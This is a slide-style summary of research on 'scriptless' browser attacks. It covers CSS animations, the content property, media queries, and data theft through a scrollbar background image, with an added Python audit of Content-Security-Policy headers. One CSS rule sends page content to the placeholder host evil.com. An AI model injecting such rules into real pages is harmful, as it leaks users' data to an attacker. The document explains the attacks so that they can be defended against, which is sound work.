SCRIPTLESS ATTACKS: STEALING THE PIE WITHOUT TOUCHING THE SILL

BACKGROUND

• XSS recently replaced SQL injection and related server-side injection attacks as the number one threat in the OWASP (Open Web Application Security Project) ranking.

• As popular applications like Skype, Outlook, Thunderbird and Windows 8 use HTML, users are turning to security extensions like NoScript.

• Given all these defense strategies, we expect that attackers will strive to develop “scriptless attacks” that achieve the same goal as XSS attacks without using any scripting.

BEYOND SCRIPT-BASED ATTACKS

• Assumptions:

  • The attacker can inject arbitrary data into the DOM rendered by the browser

  • We assume that scripting is completely disabled

• The following browser features are useful building blocks in constructing attacks:

  • Web fonts based on SVG and WOFF: attackers employ these fonts and use their features to vary the properties of displayed website content.

ATTACK COMPONENTS

• CSS-based Animations

  • With CSS-based animations, it is possible to change a wide range of CSS and DOM properties over time without using any script code

• The CSS Content Property

  • CSS provides a property called content that can extract arbitrary attribute values and display the value before, after, or instead of the selected element

a[href^="http://"]:after{content:attr(href)}

• CSS Media Queries

<style type="text/css">
@media screen and (min-width: 401px){
*{background:green;}
body:after{content:'larger view-port'}
}
@media screen and (max-width: 400px){
*{background:red;}
body:after{content:'smaller view-port'}
}
</style>

MEASUREMENT-BASED CONTENT EXFILTRATION - USING SMART SCROLLBARS

• To enable a purely CSS-based data exfiltration attack, we utilize all of the available features listed in the section above.

<div id="s">secret</div>
<style type="text/css">
div#s::-webkit-scrollbar-track-piece:vertical:increment {
background:red url(//evil.com?s); }
</style>

• To mitigate this attack,

  • it is recommended to treat scrollbar backgrounds and scrollbar state backgrounds equally;

  • all background images and similar external resources should be loaded during page-load and not on appearance or state occurrence.

MITIGATION TECHNIQUES

• We conclude that several layers of protection are necessary to effectively and holistically defend against CSS-, SVG- and HTML-based data leakage:

1. Content Security Policy (CSP)

2. Detecting Detached Views

3. Miscellaneous Defense Techniques
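
Added example (not from the original slides or paper): a Python audit of a Content-Security-Policy header against the channels described above, namely injected style rules, a CSS background url() fetch and web-font loading. The function names and the two sample policies are hypothetical and constructed for illustration.

```python
# Added example: audit a CSP header (constructed samples) for scriptless channels.

def parse_csp(header):
    """Parse a Content-Security-Policy value into {directive: [sources]}."""
    policy = {}
    for part in header.split(";"):
        tokens = part.lower().split()
        if tokens and tokens[0] not in policy:  # first occurrence wins
            policy[tokens[0]] = tokens[1:]
    return policy

def effective(policy, directive):
    """Source list for a fetch directive, falling back to default-src."""
    if directive in policy:
        return policy[directive]
    return policy.get("default-src")  # None: nothing restricts this fetch

def any_host(sources):
    """True if the list is absent or lets a rule reach an arbitrary host."""
    return sources is None or bool({"*", "http:", "https:"} & set(sources))

def inline_style_allowed(sources):
    """'unsafe-inline' counts only when no nonce or hash source is present."""
    if sources is None:
        return True
    strict = any(s.startswith(("'nonce-", "'sha")) for s in sources)
    return "'unsafe-inline'" in sources and not strict

def audit(header):
    """List the CSS- and font-based leak channels the policy leaves open."""
    policy = parse_csp(header)
    findings = []
    style = effective(policy, "style-src")
    if inline_style_allowed(style) or any_host(style):
        findings.append("style-src: injected style rules are applied")
    # A CSS background url(), as in the scrollbar rule, is an image fetch.
    if any_host(effective(policy, "img-src")):
        findings.append("img-src: background url() may load from any host")
    # SVG and WOFF web fonts are font fetches.
    if any_host(effective(policy, "font-src")):
        findings.append("font-src: web fonts may load from any host")
    return findings

WEAK = "default-src *; script-src 'none'; style-src 'self' 'unsafe-inline'"
STRICT = "default-src 'none'; style-src 'self'; img-src 'self'; font-src 'self'"

if __name__ == "__main__":
    for name, header in (("weak", WEAK), ("strict", STRICT)):
        print(name, audit(header) or "no open channel found")
```

A policy that only sets script-src 'none' matches the "scripting is completely disabled" assumption and still reports all three channels as open.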

Conclusion:

While the attacks discussed in this paper presumably do not represent the entirety of ways to illegitimately retrieve sensitive user-data, we believe that the attack components discussed in this paper are of great importance to other attack vectors.